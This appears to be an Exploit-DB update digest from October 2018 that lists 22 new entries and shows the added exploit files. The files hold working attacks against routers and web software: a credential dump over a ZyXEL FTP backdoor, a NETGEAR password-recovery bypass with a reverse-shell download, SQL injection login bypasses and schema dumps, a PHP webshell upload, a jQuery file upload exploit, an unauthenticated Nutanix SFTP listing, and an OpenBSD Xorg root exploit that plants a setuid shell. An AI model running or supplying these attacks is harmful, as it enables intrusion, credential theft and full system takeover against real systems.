DB: 2018-10-31

22 changes to exploits/shellcodes

ZyXEL VMG3312-B10B < 1.00(AAPP.7) - Credential Disclosure
QNAP NetBak Replicator 4.5.6.0607 - Denial of Service (PoC)
SIPp 3.3.990 - Local Buffer Overflow (PoC)
R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)
xorg-x11-server 1.20.3 - Privilege Escalation
Any Sound Recorder 2.93 - Buffer Overflow Local (SEH) (Metasploit)

Nutanix AOS & Prism < 5.5.5 (LTS) / < 5.8.1 (STS) - SFTP Authentication Bypass
South Gate Inn Online Reservation System 1.0 - 'q' SQL Injection
Electricks eCommerce 1.0 - 'prodid' SQL Injection
phptpoint Pharmacy Management System 1.0 - 'username' SQL Injection
Webiness Inventory 2.9 - Arbitrary File Upload
NETGEAR WiFi Router R6120 - Credential Disclosure
MyBB Downloads 2.0.3 - SQL Injection
Expense Management 1.0 - Arbitrary File Upload
University Application System 1.0 - SQL Injection / Cross-Site Request Forgery (Add Admin)
Notes Manager 1.0 - Arbitrary File Upload
Instagram Clone 1.0 - Arbitrary File Upload
Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal
Asaancart Simple PHP Shopping Cart 0.9 - Arbitrary File Upload / SQL Injection
CI User Login and Management 1.0 - Arbitrary File Upload

Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)

exploits/hardware/dos/45746.php

@@ -0,0 +1,35 @@
+# Exploit Title: ZyXEL VMG3312-B10B - Leak Credentials < 1.00(AAPP.7)
+# Date: 2018-10-28
+# Exploit Author: numan türle @numanturle
+# Vendor Homepage: https://www.zyxel.com/
+# Software Link: ftp://ftp.zyxel.com.tr/ZyXEL_URUNLERI/MODEMLER/VDSL_MODEMLER/VMG3312-B10B/
+# Firmware: 1.00(AAPP.0)D7 
+# Tested on: windows
+# Fixed firmware: 1.00(AAPP.7)
+
+
+<?php 
+$ftp_server = "192.168.1.1"; // modem ip address
+$ftp_conn = ftp_connect($ftp_server) or die("ftp server close");
+$login = ftp_login($ftp_conn, "support", "support"); // backdoor 
+
+$local_file = "crackme";
+$server_file = "/var/csamu"; // base64_encode files
+
+if (ftp_get($ftp_conn, $local_file, $server_file, FTP_BINARY)) {
+	$open = file($local_file);
+	foreach($open as $u_p){
+		$bomb = explode(" ",$u_p);
+		$user = $bomb[0];
+		$pass = base64_decode($bomb[1]);
+		if(!empty($pass)){
+			echo "{$user}:{$pass}<br>";
+		}else {
+			continue;
+		}
+	}
+}else {
+	echo "pfff";
+}
+ftp_close($ftp_conn); 
+?>

exploits/hardware/webapps/45741.txt

@@ -0,0 +1,34 @@
+# Exploit Title: NETGEAR WiFi Router R6120 - Credential Disclosure
+# Date: 2018-10-28
+# Exploit Author: Wadeek
+# Hardware Version: R6120
+# Firmware Version: 1.0.0.30
+# Vendor Homepage: https://www.netgear.com/support/product/R6120.aspx
+# Firmware Link: http://www.downloads.netgear.com/files/GDC/R6120/R6120-V1.0.0.30.zip
+
+# == Files Containing Juicy Info ==
+>> http://192.168.1.1:56688/rootDesc.xml (Server:  Unspecified, UPnP/1.0, Unspecified)
+<serialNumber>SSSSSSSNNNNNN</serialNumber>
+
+# == Security Questions Bypass > Password Disclosure ==
+>> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
+<POST REQUEST>
+htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
+(replace)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
+(by)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=passwordrecovered.htm&SID=
+<POST RESPONSE>
+">You have successfully recovered the admin password.</span>
+">Router Admin Username</span>:&nbsp;admin</td>
+">Router Admin Password</span>:&nbsp;Str0ng+-Passw0rd</td>
+
+# == Authenticated Telnet Command Execution ==
+>> http://admin:Str0ng+-Passw0rd@192.168.1.1/setup.cgi?todo=debug
+:~$ telnet 192.168.1.1
+R6120 login: admin
+Password: Str0ng+-Passw0rd
+{
+upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
+download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
+}

exploits/jsp/webapps/45755.txt

@@ -0,0 +1,93 @@
+<!--
+# Exploit Title: Path traversal vulnerability in Microstrategy Web version 7
+# Date: 29-10-2018
+# Exploit Author: Rafael Pedrero
+# Vendor Homepage: https://www.microstrategy.com
+# Software Link: https://www.microstrategy.com
+# Version: Microstrategy Web version 7
+# Tested on: all
+# CVE : CVE-2018-18777
+# Category: webapps
+
+1. Description
+
+Directory traversal vulnerability in Microstrategy Web, version 7, in
+"/WebMstr7/servlet/mstrWeb" (in the parameter subpage) allows remote
+authenticated users to bypass intended SecurityManager restrictions and
+list a parent directory via a /.. (slash dot dot) in a pathname used by a
+web application.
+
+
+2. Proof of Concept
+
+http://X.X.X.X/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=../../../../../../../../etc/passwd
+
+3. Solution:
+
+The product is discontinued. Update to last version this product.
+Patch:
+https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
+
+-->
+
+<!--
+# Exploit Title: Cross Site Scripting in Microstrategy Web version 7
+# Date: 29-10-2018
+# Exploit Author: Rafael Pedrero
+# Vendor Homepage: https://www.microstrategy.com
+# Software Link: https://www.microstrategy.com
+# Version: Microstrategy Web version 7
+# Tested on: Unix
+# CVE : CVE-2018-18775
+# Category: webapps
+
+1. Description
+
+Microstrategy Web, version 7, does not sufficiently encode user-controlled
+inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the
+Login.asp Msg parameter.
+
+
+2. Proof of Concept
+
+http://X.X.X.X/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=
+"><script>alert("XSS");</script><"
+
+3. Solution:
+
+The product is discontinued. Update to last version this product.
+Patch:
+https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
+
+-->
+
+<!--
+# Exploit Title: Cross Site Scripting in Microstrategy Web version 7
+# Date: 29-10-2018
+# Exploit Author: Rafael Pedrero
+# Vendor Homepage: https://www.microstrategy.com
+# Software Link: https://www.microstrategy.com
+# Version: Microstrategy Web version 7
+# Tested on: all
+# CVE : CVE-2018-18776
+# Category: webapps
+
+1. Description
+
+Microstrategy Web, version 7, does not sufficiently encode user-controlled
+inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the
+admin.asp ShowAll parameter.
+
+
+2. Proof of Concept
+
+http://X.X.X.X/microstrategy7/admin/admin.asp?ShowAll=
+"><script>alert("XSS")</script><"&ShowAllServers=show
+
+3. Solution:
+
+The product is discontinued. Update to last version this product.
+Patch:
+https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
+
+-->

exploits/linux/dos/45750.txt

@@ -0,0 +1,23 @@
+# Exploit Title: SIPp 3.3.990 - Local Buffer Overflow (PoC)
+# Date: 2018-10-29
+# Exploit Author: Nawaf Alkeraithe
+# Vendor Homepage: http://sipp.sourceforge.net/
+# Software Link:
+https://sourceforge.net/projects/sipp/files/sipp/3.4/sipp-3.3.990.tar.gz/download
+<https://github.com/SIPp/sipp/releases>
+# Version: SIPp v3.4-beta1 (aka v3.3.990)-SCTP-PCAP built Oct 29 2018
+# Tested on: 3.3.990
+
+$ ./sipp -trace_logs $(python -c 'print "A"*300')
+
+
+
+$ ./sipp -message_file $(python -c 'print "A"*300')
+
+
+
+$ ./sipp -calldebug_file $(python -c 'print "A"*300')
+
+
+
+$ ./sipp -trace_err $(python -c 'print "A"*300')

exploits/multiple/remote/45748.py

@@ -0,0 +1,31 @@
+# Exploit Title: Nutanix AOS & Prism - SFTP Authentication Bypass
+# Date: 2018-10-27
+# Exploit Author: Adam Brown
+# Vendor Homepage: https://www.nutanix.org
+# Software Link: https://www.nutanix.com/products/software-options/
+# Version: < 5.5.5 (LTS), < 5.8.1 (STS)
+# Tested on: Acropolis Operating System
+# CVE : Related to CVE-2018-7750
+#
+# This PoC is based on discussions found at the following blog post:
+#   https://coffeegist.com/security/paramiko-ssh-authentication-bypass-in-nutanix/
+# TLDR, the Acropolis SFTP server doesn't check if the client has completed the
+# authentication step before allowing the client to open channels. The PoC below
+# connects to the acropolis SFTP server, and lists the root directory without
+# authenticating.
+
+#!/usr/bin/python
+import paramiko
+
+host = '127.0.0.1'
+port = 2222
+
+trans = paramiko.Transport((host, port))
+trans.start_client()
+
+# If the call below is skipped, no username or password is required.
+# trans.auth_password('username', 'password')
+
+sftp = paramiko.SFTPClient.from_transport(trans)
+print(sftp.listdir('/'))
+sftp.close()

exploits/openbsd/local/45742.sh

@@ -0,0 +1,76 @@
+# Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation
+# Date: 2018-10-27
+# Exploit Author: Marco Ivaldi
+# Vendor Homepage: https://www.x.org/
+# Version: xorg-x11-server 1.19.0 - 1.20.2
+# Tested on: OpenBSD 6.3 and 6.4
+# CVE : CVE-2018-14665
+
+# raptor_xorgasm
+
+#!/bin/sh
+
+#
+# raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron
+# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>
+#
+# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission 
+# check for -modulepath and -logfile options when starting Xorg. X server 
+# allows unprivileged users with the ability to log in to the system via 
+# physical console to escalate their privileges and run arbitrary code under 
+# root privileges (CVE-2018-14665).
+#
+# This exploit targets OpenBSD's cron in order to escalate privileges to
+# root on OpenBSD 6.3 and 6.4. You don't need to be connected to a physical
+# console, it works perfectly on pseudo-terminals connected via SSH as well.
+#
+# See also:
+# https://lists.x.org/archives/xorg-announce/2018-October/002927.html
+# https://www.exploit-db.com/exploits/45697/
+# https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850
+#
+# Usage:
+# blobfish$ chmod +x raptor_xorgasm
+# blobfish$ ./raptor_xorgasm
+# [...]
+# Be patient for a couple of minutes...
+# [...]
+# Don't forget to cleanup and run crontab -e to reload the crontab.
+# -rw-r--r--  1 root  wheel  47327 Oct 27 14:48 /etc/crontab
+# -rwsrwxrwx  1 root  wheel  7417 Oct 27 14:50 /usr/local/bin/pwned
+# blobfish# id
+# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel)
+#
+# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):
+# OpenBSD 6.4 (Xorg 1.19.6) [tested]
+# OpenBSD 6.3 (Xorg 1.19.6) [tested]
+#
+
+echo "raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron"
+echo "Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>"
+
+# prepare the payload
+cat << EOF > /tmp/xorgasm
+cp /bin/sh /usr/local/bin/pwned # fallback in case gcc is not available
+echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
+gcc /tmp/pwned.c -o /usr/local/bin/pwned # most dirs are mounted nosuid
+chmod 4777 /usr/local/bin/pwned
+EOF
+chmod +x /tmp/xorgasm
+
+# trigger the bug
+cd /etc
+Xorg -fp "* * * * * root /tmp/xorgasm" -logfile crontab :1 &
+sleep 5
+pkill Xorg
+
+# run the setuid shell
+echo
+echo "Be patient for a couple of minutes..."
+echo
+sleep 120
+echo
+echo "Don't forget to cleanup and run crontab -e to reload the crontab."
+ls -l /etc/crontab*
+ls -l /usr/local/bin/pwned
+/usr/local/bin/pwned

exploits/php/webapps/45584.txt

@@ -15,3 +15,284 @@
 
 # Exploit Code:
 $ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
+
+
+#!/bin/bash 
+
+
+
+USERAGENT="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
+
+PATHS=("server/php/upload.class.php" "example/upload.php" "server/php/UploadHandler.php" "php/index.php")
+
+MALICIOUS_FILE="$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 12 | head -n 1).php"
+
+
+
+# What is added in this exploit from the original version
+
+# - a bit of refactoring
+
+# - automatically request the right filename if it already exists on server ex: 'file (1).php'
+
+# - Try to detect plugin version,
+
+# - Try to detect index.html (allowing files upload via gui)
+
+
+
+# Checking curl & jq
+
+
+
+curl -h &>/dev/null
+
+if [ $? -ne 0 ]; then
+
+    echo "[!] Please install curl."
+
+    echo "# apt install curl"
+
+    exit 1
+
+fi
+
+
+
+jq -h &>/dev/null
+
+if [ $? -ne 0 ]; then
+
+    echo "[!] Please install jq."
+
+    echo "# apt install jq"
+
+    exit 1
+
+fi
+
+
+
+# Checking url
+
+
+
+if [ -z $1 ]; then
+
+    echo "[!] Please supply a target host as an argument."
+
+    echo "$0 http://www.example.com"
+
+    exit 1
+
+fi
+
+
+
+# Generating payload
+
+
+
+echo "<?php echo \"it works\"; unlink(__FILE__); ?>" > ${MALICIOUS_FILE}
+
+echo  "________________________________________________________________________________"
+
+echo  "|PoC Exploit for Blueimp's jQuery File Uploader CVE-2018-9206"
+
+echo  "|Checks for older versions of the code and upload an harmless file."
+
+echo  "|"
+
+echo  "| @_larry0, @phackt_ul"
+
+echo  "|Works for version <= 9.22.0 and with Apache > 2.3.9 (AllowOverride None)."
+
+echo  "---/"
+
+echo
+
+echo  "[+] Checking variations :"
+
+
+
+# Creating alias
+
+
+
+curl='curl --connect-timeout 10 -sk -A "${USERAGENT}"'
+
+
+
+index=-1
+
+found=0
+
+
+
+# Looking for upload php class file
+
+
+
+for x in ${PATHS[@]}; do
+
+    echo "[*] Testing... -> $1/$x"
+
+    ${curl} -i "$1/$x" | head -1 | grep 200 &>/dev/null
+
+
+
+    if [ $? -eq 0 ]; then
+
+        echo "[+] Found Path: $x"
+
+        index=$((${index}+1))
+
+        found=1
+
+        break;
+
+    fi;
+
+
+
+    index=$((${index}+1))
+
+
+
+done
+
+
+
+# Determining the exploit path according to the jquery version
+
+
+
+exploit_path=""
+
+
+
+if [ ${index} -eq 0 -o ${index} -eq 2 ];then
+
+    exploit_path="server/php/index.php"
+
+fi
+
+
+
+if [ ${index} -eq 1 ];then
+
+    exploit_path="example/upload.php"
+
+fi
+
+
+
+if [ ${index} -eq 3 ];then
+
+    exploit_path="php/index.php"
+
+fi
+
+
+
+if [ ${found} -ne 1 ]; then
+
+    echo "[!] ### Error: A vulnerable jQuery-File-Upload plugin was not found!"
+
+    exit 1
+
+fi
+
+
+
+# Trying to detect bower.json, package.json
+
+
+
+version_files=("bower.json package.json")
+
+
+
+for x in ${version_files[@]}; do
+
+    version=`${curl} "$1/$x" | jq -r .version`
+
+    if [ "X" != "X""${version}" ]; then
+
+        echo "[!] Found: Plugin version ${version}"
+
+        break;
+
+    fi
+
+done
+
+
+
+# Trying to detect index.html
+
+
+
+${curl} "$1/index.html" | grep -i "jquery file upload" &>/dev/null
+
+
+
+if [ $? -eq 0 ]; then
+
+    echo "[!] Found: $1/index.html is accessible"
+
+fi
+
+
+
+# Uploading payload
+
+
+
+res=""
+
+echo "[+] Running ${curl} -F \"files[]=@${MALICIOUS_FILE}\" -F \"filename=${MALICIOUS_FILE}\" \"$1/${exploit_path}\""
+
+
+
+filename=`${curl} -F "files[]=@${MALICIOUS_FILE}" -F "filename=${MALICIOUS_FILE}" "$1/${exploit_path}" | jq -r .files[].name`
+
+
+
+if [ "X""${filename}" == "X" ]; then
+
+    echo "[!] It seems that we had a false positive! :("
+
+    exit 1
+
+fi
+
+
+
+filename=`echo "$filename" | sed 's/ /%20/g'`
+
+
+
+# Trying to see if victim has been exploited
+
+
+
+echo "[+] Testing path: $1/$(dirname ${exploit_path})/files/${filename}"
+
+res=`${curl} "$1/$(dirname ${exploit_path})/files/${filename}"`
+
+
+
+if [ "${res}" == "it works" ]; then
+
+    echo "[!] Found: $1 is vulnerable"
+
+else
+
+    echo "[+] Seems not vulnerable :("
+
+fi
+
+
+
+rm -f "${MALICIOUS_FILE}" &>/dev/null

exploits/php/webapps/45736.txt

@@ -0,0 +1,61 @@
+# Exploit Title: South Gate Inn Online Reservation System 1.0 - 'q' SQL Injection
+# Dork: N/A
+# Date: 2018-10-29
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/users/janobe
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/southgateinn_0.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/admin/mod_users/controller.php?action=edit
+# 
+POST /[PATH]/admin/mod_users/controller.php?action=edit HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 104
+USERID=1&UNAME=Anonymous&USERNAME=efe&deptid=&UPASS=efe&ROLE=Administrator&deptid=&PHONE=912856478&save=
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 14:20:22 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 57
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/index.php?p=accomodation&q=[SQL]
+# 
+GET /[PATH]/index.php?p=accomodation&q=-Standard%20Room%27%20%20UNION%20SELECT%201,2,3,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),5,6,7,8,9,10,11--%20- HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 14:23:59 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8

exploits/php/webapps/45737.txt

@@ -0,0 +1,77 @@
+# Exploit Title: Electricks eCommerce 1.0 - 'prodid' SQL Injection
+# Dork: N/A
+# Date: 2018-10-29
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/users/billyblue
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/_billyblue/electricks.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/index_search.php
+# 
+#[PATH]/index_search.php
+#....
+#139 if (isset($_POST['search'])){
+#140                                                             
+#141 $search=$_POST['search'];
+#142 
+#143 $query="SELECT * FROM products WHERE category LIKE '%$search%' OR prod_name LIKE '%$search%' OR prod_desc LIKE '%$search%'";
+#144 $result = mysqli_query($dbconn,$query);
+#145 while($res=mysqli_fetch_array($result)){
+#146 $prod_id=$res['prod_id'];
+#....
+POST /[PATH]/index_search.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 265
+search=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 14:51:00 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/pages/product_details.php?prod_id=[SQL]
+# 
+#[PATH]/pages/product_details.php
+#....
+#49     include('../config/dbconn.php');
+#50     $prod_id=$_GET['prod_id'];
+#51     $query = "SELECT * FROM products WHERE prod_id='$prod_id'";
+#52     $result = mysqli_query($dbconn,$query);
+#53     while($res = mysqli_fetch_array($result)) {  
+#....
+GET /[PATH]/pages/product_details.php?prod_id=%2d%31%32%27%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%28%33%29%2c%28%34%29%2c%28%35%29%2c%28%36%29%2c%28%37%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%29%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 14:55:09 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 7673
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8

exploits/php/webapps/45739.txt

@@ -0,0 +1,46 @@
+# Exploit Title:  phptpoint Pharmacy Management System 1.0 - 'username' SQL injection
+# Date: 2018-10-24
+# Exploit Author: Boumediene KADDOUR
+# Unit: Algerie Telecom R&D Unit
+# Vendor Homepage: https://www.phptpoint.com/
+# Software Link: https://www.phptpoint.com/pharmacy-management-system/
+# Version: 1
+# Tested on: WAMP windows 10 x64
+# CVE: unknown
+
+# Description:
+# phptpoint Pharmacy Management System SQL injection suffers from a SQL
+# injection vulnerability that allows an attacker to bypass the login page
+# and authenticate as admin or any other user.
+
+# Vulnerable Code:
+
+# 4 $username=$_POST['username'];
+# 5 $password=$_POST['password'];
+# 6 $position=$_POST['position'];
+# 7 switch($position){
+# 8 case 'Admin':
+# 9 $result=mysql_query("SELECT admin_id, username FROM admin WHERE
+# username='$username' AND password='$password'");
+# 10 $row=mysql_fetch_array($result);
+
+# Payload:
+
+POST /Pharmacy/index.php HTTP/1.1
+Host: 172.16.122.4
+Content-Length: 80
+Cache-Control: max-age=0
+Origin: http://172.16.122.4
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer: http://172.16.122.4/Pharmacy/index.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9,fr;q=0.8,fr-FR;q=0.7
+Cookie: PHPSESSID=2kn5jlcarggk5u3bl1crarrj85
+Connection: close
+
+username=admin%27+OR+1+--+&password=anyPassword&position=Admin&submit=Login

exploits/php/webapps/45740.txt

@@ -0,0 +1,120 @@
+# Exploit Title:  Webiness Inventory 2.9 - Arbitrary File Upload
+# Date: 2018-10-27
+# Exploit Author: Boumediene KADDOUR 
+# Unit: Algerie Telecom R&D Unit
+# Software Link: https://github.com/webiness/webiness_inventory
+# Version: 2.9<
+# Tested on: WAMP windows 10 x64
+# CVE: unknown
+
+# Vulnerable Code: https://github.com/webiness/webiness_inventory/blob/master/protected/library/ajax/WsSaveToModel.php
+
+46 foreach ($_FILES as $file) {
+47    $fileName = $file['name'];
+48    $fileTmp = $file['tmp_name'];
+49    $destDir = WsROOT.'/runtime/'.$model;
+50
+51    $field = key($_FILES);
+52
+53    // files are upload to "runtime" directory create destination directory
+54    // if not exist
+55    if (!file_exists($destDir)) {
+56        mkdir($destDir, 0777, true);
+57    }
+58
+59    // allowed file size is 3MB
+60    if ($file['size'] > 3145728) {
+61        continue;
+62    }
+63
+64   // remove old file with same name
+65    if (file_exists($destDir.'/'.$fileName)) {
+66        unlink($destDir.'/'.$fileName);
+67    }
+68
+69    // upload file
+70    move_uploaded_file($fileTmp, $destDir.'/'.$fileName);
+71    $m->$field= $fileName;
+72 }
+
+# Proof Of Concept
+
+POST /webiness_inventory-2.3/protected/library/ajax/WsSaveToModel.php HTTP/1.1
+Host: 172.16.122.4
+Content-Length: 1838
+Accept: */*
+Origin: http://172.16.122.4
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUOOyIF2f26nDrsM7
+Referer: http://172.16.122.4/webiness_inventory-2.3/index.php?request=partners/index/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9,fr;q=0.8,fr-FR;q=0.7
+Cookie: resolve_ids=0; order_dir_list_by=1A; _csrf=b49cff27d7c0ccd3a8dd5af3813025249dc909f2a20c12efcb7770f945715b06a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%224dWxR4kKmI-ZSWJBsigl0tHhdecVhozc%22%3B%7D; language=32d49278f28c78229de164fe79dc13b6adb3c98af2d133240eb1ffc44771ad3da%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22language%22%3Bi%3A1%3Bs%3A2%3A%22en%22%3B%7D; PHPSESSID=h66id6epvp8g1uoshrdog53323
+Connection: close
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="model_name"
+
+PartnerModel
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="id"
+
+2
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="partner_name"
+
+My crucial Partner
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="logo"; filename="shell.php"
+Content-Type: application/octet-stream
+
+<?php system($_GET['cmd']);?>
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="id_number"
+
+25
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="tax_number"
+
+225588664477
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="iban"
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="address1"
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="address2"
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="region_state"
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="zip"
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="city"
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="country"
+
